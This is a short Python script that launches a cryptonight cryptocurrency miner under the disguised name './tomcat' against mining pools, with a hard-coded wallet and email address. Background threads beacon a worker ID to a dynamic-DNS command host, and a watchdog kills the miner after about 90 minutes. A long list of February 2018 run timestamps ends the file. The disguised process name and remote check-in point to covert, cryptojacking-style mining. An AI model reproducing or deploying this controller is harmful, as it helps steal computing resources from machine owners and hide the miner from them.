import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:03.860397
#2018-02-17 16:42:05.469571
#2018-02-17 18:28:06.147413
#2018-02-17 20:17:03.766720
#2018-02-17 22:04:04.179828
#2018-02-17 23:48:01.999430
#2018-02-18 01:37:04.926414
#2018-02-18 03:23:07.185677
#2018-02-18 05:11:02.085983
#2018-02-18 07:03:07.040748
#2018-02-18 08:51:02.212123
#2018-02-18 10:37:06.887577
#2018-02-18 12:22:05.898765
#2018-02-18 14:09:05.563957
#2018-02-18 15:59:06.964517
#2018-02-18 17:49:04.970094
#2018-02-18 19:35:04.369965
#2018-02-18 21:20:06.828521
#2018-02-18 23:08:02.230058
#2018-02-19 00:54:06.045014
#2018-02-19 02:41:05.295423
#2018-02-19 04:28:05.724331
#2018-02-19 06:13:04.936447
#2018-02-19 07:59:06.569477
#2018-02-19 09:51:02.075264
#2018-02-19 11:39:06.092820
#2018-02-19 13:26:06.103218
#2018-02-19 15:16:07.633666
#2018-02-19 17:05:10.543479
#2018-02-19 18:50:08.574134
#2018-02-19 20:38:05.821406
#2018-02-19 22:25:02.873483
#2018-02-20 00:11:04.887744
#2018-02-20 01:57:01.291352
#2018-02-20 03:46:06.096695
#2018-02-20 05:31:08.222462
#2018-02-20 07:15:09.080424
#2018-02-20 09:01:05.335848
#2018-02-20 10:44:04.779968
#2018-02-20 12:31:01.284554
#2018-02-20 14:17:01.245763
#2018-02-20 16:00:14.807163
#2018-02-20 17:48:07.515427
#2018-02-20 19:34:05.360749
#2018-02-20 21:22:08.270752
#2018-02-20 23:06:08.499297
#2018-02-21 00:51:06.708941
#2018-02-21 02:36:05.698354
#2018-02-21 04:24:08.122488
#2018-02-21 06:12:05.903643
#2018-02-21 07:57:03.358664
#2018-02-21 09:42:05.386767
#2018-02-21 11:31:09.470002
#2018-02-21 13:19:06.200360
#2018-02-21 15:04:08.389000
#2018-02-21 16:53:09.314241
#2018-02-21 18:43:08.201117
#2018-02-21 20:31:05.648376
#2018-02-21 22:17:07.899357
#2018-02-22 00:08:06.666118
#2018-02-22 01:57:01.775991
#2018-02-22 03:44:05.809993
#2018-02-22 05:31:06.180444
#2018-02-22 07:16:04.697153
#2018-02-22 09:03:07.359598
#2018-02-22 10:51:01.825137
#2018-02-22 12:37:05.492238
#2018-02-22 14:21:08.238756
#2018-02-22 16:08:13.262714
#2018-02-22 17:55:07.724570
#2018-02-22 19:43:06.272353
#2018-02-22 21:35:01.425222
#2018-02-22 23:22:06.978234
#2018-02-23 01:09:04.445174
#2018-02-23 02:55:09.631775
#2018-02-23 04:41:07.445794
#2018-02-23 06:28:03.804544
#2018-02-23 08:15:07.052815
#2018-02-23 10:31:07.576966
#2018-02-23 12:23:05.664789
#2018-02-23 14:11:09.561275
#2018-02-23 16:03:01.483702
#2018-02-23 17:47:06.557109
#2018-02-23 19:33:06.370005
#2018-02-23 21:16:02.014413
#2018-02-23 23:05:03.827005
#2018-02-24 00:50:08.690577
#2018-02-24 02:42:05.828135
#2018-02-24 05:28:05.898352
#2018-02-24 07:15:06.981434
#2018-02-24 09:06:07.241064
#2018-02-24 10:44:02.116396
#2018-02-24 12:31:06.487334
#2018-02-24 14:09:04.935823
#2018-02-24 15:42:07.212036
#2018-02-24 17:20:04.126325
#2018-02-24 18:54:06.460334
#2018-02-24 20:26:05.125710
#2018-02-24 21:56:06.531905
#2018-02-25 00:40:07.343910
#2018-02-25 02:41:02.173470
#2018-02-25 06:27:06.928971